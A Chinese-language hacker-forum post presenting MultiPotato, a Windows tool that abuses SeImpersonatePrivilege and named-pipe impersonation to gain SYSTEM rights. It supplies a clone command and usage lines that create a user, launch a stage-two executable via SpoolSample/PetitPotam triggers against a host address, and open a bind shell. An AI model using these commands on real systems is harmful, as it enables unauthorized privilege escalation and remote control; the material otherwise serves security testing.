跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

技术分享:如何利用SeImpersonatePrivilege权限来检测SYST

精选回复

发布于

技术分享:如何利用SeImpersonatePrivilege权限来检测SYST

61ee171fab2ba.jpg

写在前面的话

在这篇文章中,我们将给大家演示如何通过SeImpersonatePrivilege权限来获取SYSTEM权限,并通过提权来判断自己系统内的SYSTEM权限安全。但需要注意的地方在于:

1、本文所涉及到的内容并不包含可以用于Payload武器化的任何SYSTEM认证触发trigger,本文提供的代码可以用于自行开发和整合trigger。

2、本文所使用的技术不仅使用了CreateProcessWithTokenW来生成一个新的进程,而且我们还可以使用CreateProcessWithTokenW、CreateProcessAsUserW、CreateUser和BindShell来实现类似的效果。

关于MultiPotato

MultiPotato这个项目能够开启一台命名管道服务器,并模拟任何连接到它的用户,然后执行上面提到的功能选项之一。如果将来发布任何新的系统身份验证触发器,此工具仍然可以用于提升权限,只不过需要使用另一个命名管道名称而已。

工具下载

广大研究人员可以使用下列命令将该项目源码克隆至本地:

git clone https://github.com/S3cur3Th1sSh1t/MultiPotato.git

工具使用

1、使用修改后的PetitPotam触发器来调用工具的CreateUser创建用户:

c:\temp\MultiPotato> MultiPotato.exe -t CreateUser

接下来,MultiPotato将会监听命名管道“\\.\pipe\pwned/pipe/srvsvc”。此时,我们也可以通过-p选项来调整参数并使用其他的SYSTEM认证触发器:

c:\temp\MultiPotato> PetitPotamModified.exe localhost/pipe/pwned localhost

当然了,我们也可以利用有效的低级权限并使用远程系统中的PetitPotam.py来作为触发器。

1642472779_61e6254ba6539e594bbea.png!sma

2、使用SpoolSample触发器调用CreateProcessAsUserW:

c:\temp\MultiPotato> MultiPotato.exe -t CreateProcessAsUserW -p "pwned\pipe\spoolss" -e "C:\temp\stage2.exe"

使用下列命令触发:

c:\temp\MultiPotato>MS-RPRN.exe \\192.168.100.150 \\192.168.100.150/pipe/pwned

1642472793_61e625596d5f39be3a96c.png!sma

3、BindShell(SpoolSample管道):

c:\temp\MultiPotato> MultiPotato.exe -t BindShell -p "pwned\pipe\spoolss"

1642472810_61e6256af3b033bd02be9.png!sma

1642472816_61e625709d4e0c3077806.png!sma

项目地址

MultiPotato:【GitHub传送门】

参考资料

https://github.com/S3cur3Th1sSh1t/MultiPotato/blob/main/Multipotato/common.h

https://twitter.com/splinter_code

https://twitter.com/decoder_it

https://github.com/antonioCoco/RoguePotato

本文作者:Alpha_h4ck

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。